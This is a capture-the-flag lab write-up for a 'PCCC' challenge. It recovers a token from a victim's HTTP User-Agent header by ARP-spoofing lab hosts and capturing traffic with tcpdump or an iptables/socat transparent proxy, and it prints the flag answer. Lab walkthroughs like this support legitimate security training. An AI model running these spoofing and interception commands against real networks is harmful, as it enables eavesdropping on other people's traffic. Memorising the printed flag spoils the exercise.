master
Raw Download raw file

Token 5: HTTP Header Token

Token: PCCC{Header_Thieving_Time_Protocol_14_71CD}

Objective

Find this token in the header of the HTTP request sent by webvictim.pccc.

Hosts

  • webvictim.pccc: 10.0.91.136
  • web.pccc: 10.0.91.135

Method: ARP Spoof + HTTP Capture

Step 1: Enable IP forwarding

sysctl -w net.ipv4.ip_forward=1

Step 2: ARP spoof between victim and web server

arpspoof -i eth1 -t 10.0.91.136 10.0.91.135 &
arpspoof -i eth1 -t 10.0.91.135 10.0.91.136 &

Step 3: Capture HTTP traffic

tcpdump -i eth1 -A -s0 host 10.0.91.136 and port 80

Or use a transparent proxy:

iptables -t nat -A PREROUTING -i eth1 -s 10.0.91.136 -d 10.0.91.135 -p tcp --dport 80 -j REDIRECT --to-port 8080
socat -v TCP-LISTEN:8080,fork,reuseaddr TCP:10.0.91.135:80

Step 4: Find the token in User-Agent

The HTTP request contains:

GET / HTTP/1.1
Host: web.pccc
User-Agent: PCCC{Header_Thieving_Time_Protocol_14_71CD}
...

The token is in the User-Agent header.

Why It Works

HTTP traffic is unencrypted. By positioning yourself between the client and server via ARP spoofing, you can read all HTTP headers including custom ones like User-Agent.

Cleanup

pkill arpspoof
iptables -t nat -D PREROUTING -i eth1 -s 10.0.91.136 -d 10.0.91.135 -p tcp --dport 80 -j REDIRECT --to-port 8080